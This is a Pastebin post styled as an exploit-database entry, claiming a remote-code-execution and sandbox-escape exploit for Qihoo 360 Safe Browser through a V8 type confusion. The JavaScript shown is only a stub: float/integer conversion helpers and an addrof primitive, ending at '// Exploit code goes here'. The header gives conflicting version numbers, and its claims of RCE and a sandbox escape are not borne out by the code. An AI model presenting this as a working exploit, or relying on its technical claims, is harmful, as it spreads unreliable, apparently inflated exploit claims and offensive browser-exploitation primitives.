Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Qihoo 360 Safe Browser v12.3.1611.0 - RCE with Sandbox Escape
- # Google Dork: N/A
- # Date: 2021-05-11
- # Exploit Author: youtube.com/@memorycorruptor
- # Vendor Homepage: https://browser.360.cn/se/
- # Version: Qihoo 360 Safe Browser v13.0.2170.0
- # Tested on: Windows x64 / Linux Debian x64 / MacOS
- # CVE: CVE-2021-33972
- # PoC Video: https://www.youtube.com/@memorycorruptor/videos
- # Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
- ---------------------------------------------------------------------------
- Qihoo 360 Safe Browser v12.3.1611.0 is a web browser built on the Chrome engine, specifically using the V8 JavaScript engine. A recently discovered RCE vulnerability within this version allows attackers to execute arbitrary code on a victim's computer remotely.
- The vulnerability exists in the V8 JavaScript engine, a critical component of Qihoo 360 Safe Browser v12.3.1611.0. It was discovered in 2021 and is a result of a type confusion issue. This issue occurs when the V8 engine improperly handles certain JavaScript objects, leading to memory corruption and potentially allowing an attacker to execute arbitrary code.
- function trigger() {
- let o = {a: 1};
- let p = new Proxy(o, {});
- p.__proto__ = {};
- p.__proto__.x = 0;
- let b = new ArrayBuffer(8);
- let f64 = new Float64Array(b);
- let u32 = new Uint32Array(b);
- function ftoi(val) {
- f64[0] = val;
- return BigInt(u32[0]) + (BigInt(u32[1]) << 32n);
- }
- function itof(val) {
- u32[0] = Number(val & 0xffffffffn);
- u32[1] = Number(val >> 32n);
- return f64[0];
- }
- function addrof(obj) {
- o.a = obj;
- return ftoi(p.x);
- }
- // Exploit code goes here
- }
- trigger();
- This PoC code first sets up a type confusion situation in the V8 engine by creating a proxy object and modifying its __proto__ property. The addrof function then leaks the address of an object by causing the type confusion. The ftoi and itof functions are used to convert between floating-point and integer representations, which are essential for exploiting this vulnerability.
- The RCE vulnerability can allow an attacker to execute arbitrary code on the victim's computer, potentially leading to data theft, unauthorized access, or other malicious actions. Users should update to the latest version of Qihoo 360 Chrome or an alternative browser to mitigate this vulnerability. Browser developers should apply patches to the V8 engine and ensure that proper handling of JavaScript objects is implemented to prevent such issues in the future.
- ---------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement